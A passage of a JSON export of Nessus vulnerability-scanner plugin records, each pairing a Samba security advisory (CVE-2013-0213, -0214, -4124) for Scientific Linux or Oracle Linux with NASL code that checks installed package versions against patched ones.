an\nExtended Attribute (EA) list provided by a client. A malicious client\ncould send a specially crafted EA list that triggered an overflow,\ncausing the server to loop and reprocess the list using an excessive\namount of memory. (CVE-2013-4124)\n\nNote: This issue did not affect the default configuration of the Samba\nserver.\n\nAfter installing this update, the smb service will be restarted\nautomatically.", "edition": 15, "published": "2014-03-18T00:00:00", "title": "Scientific Linux Security Update : samba on SL5.x i386/x86_64 (20140317)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0214", "CVE-2013-0213", "CVE-2013-4124"], "modified": "2014-03-18T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:libsmbclient-devel", "p-cpe:/a:fermilab:scientific_linux:samba-common", "p-cpe:/a:fermilab:scientific_linux:samba-client", "p-cpe:/a:fermilab:scientific_linux:samba-swat", "x-cpe:/o:fermilab:scientific_linux", "p-cpe:/a:fermilab:scientific_linux:samba-debuginfo", "p-cpe:/a:fermilab:scientific_linux:libsmbclient", "p-cpe:/a:fermilab:scientific_linux:samba"], "id": "SL_20140317_SAMBA_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/nessus/73074", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73074);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2013-0213\", \"CVE-2013-0214\", \"CVE-2013-4124\");\n\n script_name(english:\"Scientific Linux Security Update : samba on SL5.x i386/x86_64 (20140317)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that the Samba Web Administration Tool (SWAT) did\nnot protect against being opened in a web page frame. A remote\nattacker could possibly use this flaw to conduct a clickjacking attack\nagainst SWAT users or users with an active SWAT session.\n(CVE-2013-0213)\n\nA flaw was found in the Cross-Site Request Forgery (CSRF) protection\nmechanism implemented in SWAT. An attacker with the knowledge of a\nvictim's password could use this flaw to bypass CSRF protections and\nconduct a CSRF attack against the victim SWAT user. (CVE-2013-0214)\n\nAn integer overflow flaw was found in the way Samba handled an\nExtended Attribute (EA) list provided by a client. A malicious client\ncould send a specially crafted EA list that triggered an overflow,\ncausing the server to loop and reprocess the list using an excessive\namount of memory. (CVE-2013-4124)\n\nNote: This issue did not affect the default configuration of the Samba\nserver.\n\nAfter installing this update, the smb service will be restarted\nautomatically.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1403&L=scientific-linux-errata&T=0&P=1206\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8801d904\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libsmbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libsmbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/02/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/03/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/03/18\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 5.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"libsmbclient-3.0.33-3.40.el5_10\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"libsmbclient-devel-3.0.33-3.40.el5_10\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"samba-3.0.33-3.40.el5_10\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"samba-client-3.0.33-3.40.el5_10\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"samba-common-3.0.33-3.40.el5_10\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"samba-debuginfo-3.0.33-3.40.el5_10\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"samba-swat-3.0.33-3.40.el5_10\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libsmbclient / libsmbclient-devel / samba / samba-client / etc\");\n}\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T12:48:20", "description": "From Red Hat Security Advisory 2013:1542 :\n\nUpdated samba packages that fix three security issues, several bugs,\nand add one enhancement are now available for Red Hat Enterprise Linux\n6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nIt was discovered that the Samba Web Administration Tool (SWAT) did\nnot protect against being opened in a web page frame. A remote\nattacker could possibly use this flaw to conduct a clickjacking attack\nagainst SWAT users or users with an active SWAT session.\n(CVE-2013-0213)\n\nA flaw was found in the Cross-Site Request Forgery (CSRF) protection\nmechanism implemented in SWAT. An attacker with the knowledge of a\nvictim's password could use this flaw to bypass CSRF protections and\nconduct a CSRF attack against the victim SWAT user. (CVE-2013-0214)\n\nAn integer overflow flaw was found in the way Samba handled an\nExtended Attribute (EA) list provided by a client. A malicious client\ncould send a specially crafted EA list that triggered an overflow,\ncausing the server to loop and reprocess the list using an excessive\namount of memory. (CVE-2013-4124)\n\nNote: This issue did not affect the default configuration of the Samba\nserver.\n\nRed Hat would like to thank the Samba project for reporting\nCVE-2013-0213 and CVE-2013-0214. Upstream acknowledges Jann Horn as\nthe original reporter of CVE-2013-0213 and CVE-2013-0214.\n\nThese updated samba packages include numerous bug fixes and one\nenhancement. Space precludes documenting all of these changes in this\nadvisory. Users are directed to the Red Hat Enterprise Linux 6.5\nTechnical Notes, linked to in the References, for information on the\nmost significant of these changes.\n\nAll samba users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues and add this\nenhancement. After installing this update, the smb service will be\nrestarted automatically.", "edition": 22, "published": "2013-11-27T00:00:00", "title": "Oracle Linux 6 : samba (ELSA-2013-1542)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0214", "CVE-2013-0213", "CVE-2013-4124"], "modified": "2013-11-27T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:samba-common", "p-cpe:/a:oracle:linux:samba-doc", "p-cpe:/a:oracle:linux:samba-domainjoin-gui", "p-cpe:/a:oracle:linux:libsmbclient", "p-cpe:/a:oracle:linux:samba-winbind", "p-cpe:/a:oracle:linux:samba-winbind-krb5-locator", "p-cpe:/a:oracle:linux:samba-client", "p-cpe:/a:oracle:linux:samba", "p-cpe:/a:oracle:linux:samba-swat", "p-cpe:/a:oracle:linux:samba-winbind-clients", "p-cpe:/a:oracle:linux:libsmbclient-devel", "p-cpe:/a:oracle:linux:samba-winbind-devel"], "id": "ORACLELINUX_ELSA-2013-1542.NASL", "href": "https://www.tenable.com/plugins/nessus/71103", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2013:1542 and \n# Oracle Linux Security Advisory ELSA-2013-1542 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(71103);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2013-0213\", \"CVE-2013-0214\", \"CVE-2013-4124\");\n script_bugtraq_id(57631, 61597);\n script_xref(name:\"RHSA\", value:\"2013:1542\");\n\n script_name(english:\"Oracle Linux 6 : samba (ELSA-2013-1542)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2013:1542 :\n\nUpdated samba packages that fix three security issues, several bugs,\nand add one enhancement are now available for Red Hat Enterprise Linux\n6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nIt was discovered that the Samba Web Administration Tool (SWAT) did\nnot protect against being opened in a web page frame. A remote\nattacker could possibly use this flaw to conduct a clickjacking attack\nagainst SWAT users or users with an active SWAT session.\n(CVE-2013-0213)\n\nA flaw was found in the Cross-Site Request Forgery (CSRF) protection\nmechanism implemented in SWAT. An attacker with the knowledge of a\nvictim's password could use this flaw to bypass CSRF protections and\nconduct a CSRF attack against the victim SWAT user. (CVE-2013-0214)\n\nAn integer overflow flaw was found in the way Samba handled an\nExtended Attribute (EA) list provided by a client. A malicious client\ncould send a specially crafted EA list that triggered an overflow,\ncausing the server to loop and reprocess the list using an excessive\namount of memory. (CVE-2013-4124)\n\nNote: This issue did not affect the default configuration of the Samba\nserver.\n\nRed Hat would like to thank the Samba project for reporting\nCVE-2013-0213 and CVE-2013-0214. Upstream acknowledges Jann Horn as\nthe original reporter of CVE-2013-0213 and CVE-2013-0214.\n\nThese updated samba packages include numerous bug fixes and one\nenhancement. Space precludes documenting all of these changes in this\nadvisory. Users are directed to the Red Hat Enterprise Linux 6.5\nTechnical Notes, linked to in the References, for information on the\nmost significant of these changes.\n\nAll samba users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues and add this\nenhancement. After installing this update, the smb service will be\nrestarted automatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2013-November/003804.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected samba packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libsmbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libsmbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-domainjoin-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-winbind-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-winbind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-winbind-krb5-locator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/02/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/11/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/11/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"libsmbclient-3.6.9-164.el6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"libsmbclient-devel-3.6.9-164.el6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba-3.6.9-164.el6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba-client-3.6.9-164.el6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba-common-3.6.9-164.el6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba-doc-3.6.9-164.el6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba-domainjoin-gui-3.6.9-164.el6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba-swat-3.6.9-164.el6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba-winbind-3.6.9-164.el6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba-winbind-clients-3.6.9-164.el6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba-winbind-devel-3.6.9-164.el6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba-winbind-krb5-locator-3.6.9-164.el6\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libsmbclient / libsmbclient-devel / samba / samba-client / etc\");\n}\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T12:48:12", "description": "From Red Hat Security Advisory 2013:1310 :\n\nUpdated samba3x packages that fix multiple security issues and several\nbugs are now available for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nIt was discovered that the Samba Web Administration Tool (SWAT) did\nnot protect against being opened in a web page frame. A remote\nattacker could possibly use this flaw to conduct a clickjacking attack\nagainst SWAT users or users with an active SWAT session.\n(CVE-2013-0213)\n\nA flaw was found in the Cross-Site Request Forgery (CSRF) protection\nmechanism implemented in SWAT. An attacker with the knowledge of a\nvictim's password could use this flaw to bypass CSRF protections and\nconduct a CSRF attack against the victim SWAT user. (CVE-2013-0214)\n\nAn integer overflow flaw was found in the way Samba handled an\nExtended Attribute (EA) list provided by a client. A malicious client\ncould send a specially crafted EA list that triggered an overflow,\ncausing the server to loop and reprocess the list using an excessive\namount of memory. (CVE-2013-4124)\n\nNote: This issue did not affect the default configuration of the Samba\nserver.\n\nRed Hat would like to thank the Samba project for reporting\nCVE-2013-0213 and CVE-2013-0214. Upstream acknowledges Jann Horn as\nthe original reporter of CVE-2013-0213 and CVE-2013-0214.\n\nThese updated samba3x packages also include numerous bug fixes. Space\nprecludes documenting all of these changes in this advisory. Users are\ndirected to the Red Hat Enterprise Linux 5.10 Technical Notes, linked\nto in the References, for information on the most significant of these\nchanges.\n\nAll samba3x users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. After\ninstalling this update, the smb service will be restarted\nautomatically.", "edition": 22, "published": "2013-10-09T00:00:00", "title": "Oracle Linux 5 : samba3x (ELSA-2013-1310)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0214", "CVE-2013-0213", "CVE-2013-4124"], "modified": "2013-10-09T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:samba3x-common", "p-cpe:/a:oracle:linux:samba3x-domainjoin-gui", "p-cpe:/a:oracle:linux:samba3x-winbind-devel", "p-cpe:/a:oracle:linux:samba3x-doc", "cpe:/o:oracle:linux:5", "p-cpe:/a:oracle:linux:samba3x", "p-cpe:/a:oracle:linux:samba3x-winbind", "p-cpe:/a:oracle:linux:samba3x-swat", "p-cpe:/a:oracle:linux:samba3x-client"], "id": "ORACLELINUX_ELSA-2013-1310.NASL", "href": "https://www.tenable.com/plugins/nessus/70346", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2013:1310 and \n# Oracle Linux Security Advisory ELSA-2013-1310 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(70346);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2013-0213\", \"CVE-2013-0214\", \"CVE-2013-4124\");\n script_bugtraq_id(57631, 61597);\n script_xref(name:\"RHSA\", value:\"2013:1310\");\n\n script_name(english:\"Oracle Linux 5 : samba3x (ELSA-2013-1310)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2013:1310 :\n\nUpdated samba3x packages that fix multiple security issues and several\nbugs are now available for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nIt was discovered that the Samba Web Administration Tool (SWAT) did\nnot protect against being opened in a web page frame. A remote\nattacker could possibly use this flaw to conduct a clickjacking attack\nagainst SWAT users or users with an active SWAT session.\n(CVE-2013-0213)\n\nA flaw was found in the Cross-Site Request Forgery (CSRF) protection\nmechanism implemented in SWAT. An attacker with the knowledge of a\nvictim's password could use this flaw to bypass CSRF protections and\nconduct a CSRF attack against the victim SWAT user. (CVE-2013-0214)\n\nAn integer overflow flaw was found in the way Samba handled an\nExtended Attribute (EA) list provided by a client. A malicious client\ncould send a specially crafted EA list that triggered an overflow,\ncausing the server to loop and reprocess the list using an excessive\namount of memory. (CVE-2013-4124)\n\nNote: This issue did not affect the default configuration of the Samba\nserver.\n\nRed Hat would like to thank the Samba project for reporting\nCVE-2013-0213 and CVE-2013-0214. Upstream acknowledges Jann Horn as\nthe original reporter of CVE-2013-0213 and CVE-2013-0214.\n\nThese updated samba3x packages also include numerous bug fixes. Space\nprecludes documenting all of these changes in this advisory. Users are\ndirected to the Red Hat Enterprise Linux 5.10 Technical Notes, linked\nto in the References, for information on the most significant of these\nchanges.\n\nAll samba3x users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. After\ninstalling this update, the smb service will be restarted\nautomatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2013-October/003712.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected samba3x packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba3x\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba3x-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba3x-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba3x-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba3x-domainjoin-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba3x-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba3x-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba3x-winbind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/02/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/10/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/10/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"samba3x-3.6.6-0.136.el5\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"samba3x-client-3.6.6-0.136.el5\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"samba3x-common-3.6.6-0.136.el5\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"samba3x-doc-3.6.6-0.136.el5\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"samba3x-domainjoin-gui-3.6.6-0.136.el5\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"samba3x-swat-3.6.6-0.136.el5\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"samba3x-winbind-3.6.6-0.136.el5\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"samba3x-winbind-devel-3.6.6-0.136.el5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba3x / samba3x-client / samba3x-common / samba3x-doc / etc\");\n}\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T12:48:50", "description": "From Red Hat Security Advisory 2014:0305 :\n\nUpdated samba packages that fix three security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nModerate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nIt was discovered that the Samba Web Administration Tool (SWAT) did\nnot protect against being opened in a web page frame. A remote\nattacker could possibly use this flaw to conduct a clickjacking attack\nagainst SWAT users or users with an active SWAT session.\n(CVE-2013-0213)\n\nA flaw was found in the Cross-Site Request Forgery (CSRF) protection\nmechanism implemented in SWAT. An attacker with the knowledge of a\nvictim's password could use this flaw to bypass CSRF protections and\nconduct a CSRF attack against the victim SWAT user. (CVE-2013-0214)\n\nAn integer overflow flaw was found in the way Samba handled an\nExtended Attribute (EA) list provided by a client. A malicious client\ncould send a specially crafted EA list that triggered an overflow,\ncausing the server to loop and reprocess the list using an excessive\namount of memory. 